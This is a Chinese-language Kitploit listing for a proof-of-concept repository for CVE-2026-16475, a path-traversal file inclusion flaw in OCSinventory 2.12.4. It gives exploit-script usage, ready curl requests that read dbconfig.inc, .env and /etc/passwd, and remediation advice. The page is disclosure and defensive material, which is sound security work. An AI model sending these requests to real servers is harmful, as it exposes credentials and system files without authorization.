Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-16475-PoC — 这是 CVE-2026-16475 的 PoC 官方仓库,该漏洞为 OCSinventory 2.12.4 中的 LFI(本地文件包含)。 | Kitploit
工具/GitHubGitHub/afertar/cve-2026-16475-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

这是 CVE-2026-16475 的 PoC 官方仓库,该漏洞为 OCSinventory 2.12.4 中的 LFI(本地文件包含)。

查看仓库
21个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-16475 - OCSinventory LFI 概念验证(PoC)

OCSinventory 2.12.4 中的本地文件包含(LFI)漏洞

漏洞详情

CVE 编号: CVE-2026-16475
CVSS 评分: 6.9(中危)
CWE: CWE-98(PHP 程序中对包含/引用语句的文件名控制不当)
受影响版本: OCSinventory 2.12.4
状态: 已在最新版本中修复

描述

/ajax/teledeployoptions.php 端点存在本地文件包含(LFI)漏洞,原因是 linkedoptions 参数在用于动态 XML 文件包含操作之前未经过适当的净化处理。

该端点旨在加载 XML 配置文件,但未能正确验证 linkedoptions 参数,从而允许路径遍历攻击。

未经身份验证的远程攻击者可以利用此漏洞:

  • 包含并访问应用程序目录中的任意 XML 文件
  • 通过 XML 解析器错误消息读取非 XML 文件
  • 泄露内部应用程序资源的敏感信息
  • 枚举系统文件并进行操作系统指纹识别

影响

  • 机密性: 高 - 可访问任意文件(配置文件、源代码、日志、系统文件)
  • 完整性: 无
  • 可用性: 无
  • 需要身份验证: 否
  • 需要用户交互: 否

使用方法

前提条件

root@kitploit:~
pip install -r requirements.txt

Python 版本(推荐)

root@kitploit:~
python3 exploit.py -u http://target.com -v

选项:

  • -u, --url - 目标 URL(必填)
  • -v, --verbose - 详细输出
  • -o, --output - 将成功读取的内容保存到文件

示例:

root@kitploit:~
python3 exploit.py -u http://ocs.example.com -v -o results.txt

Bash 版本

root@kitploit:~
./lfi_test.sh

编辑脚本中的 BASE_URL 变量:

root@kitploit:~
BASE_URL="http://target.com/ajax/teledeployoptions.php"

已枚举的目标

  • 应用程序配置文件(dbconfig.inc、.env、config.inc)
  • XML 工作文件(bashscriptopt、executableopt、msiapplicationopt)
  • 系统日志(apache2、mysql、auth)
  • 系统文件(/proc/、/etc/)
  • 应用程序机密信息(composer、包文件、.htaccess)

漏洞利用示例

root@kitploit:~
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"

# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"

# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"

修复建议

对于用户:

  • 立即将 OCSinventory 更新到最新版本
  • 实施 WAF 规则以阻止目录遍历模式

对于开发人员:

  • 使用 basename() 或类似函数来防止路径遍历
  • 在文件操作之前验证并净化所有用户输入
  • 实施适当的访问控制
  • 对有效的文件路径使用允许列表

参考资料

  • INCIBE 公告(西语) - 官方 CVE 协调机构
  • OCS Inventory GitHub
  • OWASP 路径遍历
  • CWE-98 定义

注意: CVE-2026-16475 由 INCIBE 协调,可能尚未收录在 NVD 中。请查阅 INCIBE 来源以获取权威信息。

法律声明

仅供教育和授权测试使用

完整的法律声明请参阅 DISCLAIMER.md。

作者

Adrián Ferrer Tarí


通过 INCIBE 协调的负责任披露

下载工具